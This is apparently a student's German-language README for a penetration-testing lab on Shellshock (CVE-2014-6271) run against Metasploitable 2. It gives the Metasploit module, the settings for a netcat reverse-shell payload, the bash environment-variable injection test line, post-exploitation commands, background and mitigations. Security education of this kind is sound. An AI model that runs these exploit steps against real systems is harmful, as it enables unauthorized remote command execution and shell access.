
# Bildungslabor zur Demonstration der Shellshock-Ausnutzung (CVE-2014-6271) mit Metasploit gegen Metasploitable 2, einschließlich Scannen, Ausnutzung, Reverse Shell und Gegenmaßnahmen.
Dies ist die praktische Aufgabe für Vulnerability Assessment and Penetration Testing – II, die sich auf die Ausnutzung und Analyse der Shellshock-Sicherheitslücke (CVE-2014-6271) konzentriert.
Durchgeführt in einer kontrollierten Laborumgebung mit Metasploitable 2 (Ziel) und Kali Linux (Angreifer).
nmap -sS -sV <target-ip>
2️⃣ Metasploit starten
msfconsole
3️⃣ Exploit-Modul laden
use exploit/multi/http/apache_mod_cgi_bash_env_exec
4️⃣ Exploit konfigurieren
set RHOST <target-ip>
set TARGETURI /cgi-bin/status
set LHOST <your-kali-ip>
set PAYLOAD cmd/unix/reverse_netcat
5️⃣ Exploit ausführen
exploit
📸 Demonstration umfasst
📡 Nmap-Scannergebnisse
⚙️ Metasploit-Konfiguration
🔄 Reverse-Shell-Sitzungsausgabe
🛠 Post-Exploitation-Befehle:
whoami
uname -a
ifconfig
📖 Theoretischer Hintergrund
Shellshock ist eine Sicherheitslücke in der GNU-Bash-Shell, die es Angreifern ermöglicht, beliebige Befehle auszuführen, indem sie diese in Umgebungsvariablen einschleusen. Entdeckt im September 2014 und als CVE-2014-6271 eingestuft, betrifft es Bash v1.14 bis v4.3.
Bash verarbeitet Funktionsdefinitionen in Umgebungsvariablen fehlerhaft und führt nach dem Funktionskörper zusätzliche Befehle aus. In Webservern, die CGI-Skripte verwenden, werden HTTP-Header zu Umgebungsvariablen, was einen einfachen Angriffspfad schafft.
Beispiel:
env x='() { :;}; echo vulnerable' bash -c "echo test"
Wenn anfällig, wird vulnerable ausgegeben.
Vollständige Remote-Codeausführung (RCE) ohne Authentifizierung
Ausnutzbar über einfache HTTP-Anfragen
Eingesetzt in Botnetzen, Würmern, gezielten Angriffen
Betraf Millionen von Servern, Routern und IoT-Geräten
Yahoo-Server – Schadsoftware über CGI-Skripte
Wopbot-Botnet – Automatisierte Ausnutzung
QNAP NAS – Remote-Shell-Zugriff & Schadsoftware
Selbstreplizierende Würmer – Verbreitung auf neue verwundbare Hosts
🛡 Prävention & Schadensbegrenzung
🔄 Bash sofort aktualisieren
🚫 Unbenutzte CGI-Skripte deaktivieren
🔥 Firewalls verwenden, um unnötigen Datenverkehr zu blockieren
🛡 Web Application Firewalls (WAF) einsetzen
📜 HTTP-Anforderungsprotokolle überwachen
👤 Prinzip der geringsten Privilegien anwenden
⚠️ Haftungsausschluss
Dieses Projekt dient ausschließlich zu Bildungszwecken. Alle Tests wurden in einer kontrollierten Laborumgebung durchgeführt. ❌ Verwenden Sie diese Techniken nicht auf Systemen ohne Erlaubnis.
👨💻 Autor: Janith Madhusankha 🎓 Kurs: BICT (Hons) in Network & Security 🏫 Institution: South Eastern University of Sri Lanka